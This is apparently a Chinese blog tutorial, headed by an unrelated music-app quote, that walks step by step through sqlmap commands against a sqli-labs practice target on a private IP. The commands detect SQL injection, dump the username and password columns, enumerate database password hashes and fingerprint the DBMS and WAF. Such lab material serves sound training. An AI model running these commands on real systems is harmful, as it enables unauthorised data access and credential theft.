踏实的感觉大概就是,因为你在,我不再招摇,因为我在,你不再动摇。。。
---- 网易云热评
一、判断是否存在注入
1、sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1'
2、有下面信息说明存在注入
二、获取数据库信息
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --dbs
三、获取数据库security里面的表信息
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -D security --tables
四、获取数据库security中users表的字段信息
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -D security -T users --columns
- 1.
五、获取数据库security中users表中的字段内容
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -D security -T users -C "password,username" --dump
六、查看数据库相关信息
1、获取数据库当前用户
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --current-user
- 1.
2、查看是否是dba权限
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --is-dba
3、查看当前数据库名称
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --current-db
4、枚举数据库用户密码
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --passwords
5、枚举数据库用户名称
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --users
七、指纹识别
1、获取更广泛的数据库管理系统指纹识别结果
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -f
2、获取更精确的指纹识别结果
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -b
八、WAF识别
sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --identify-waf
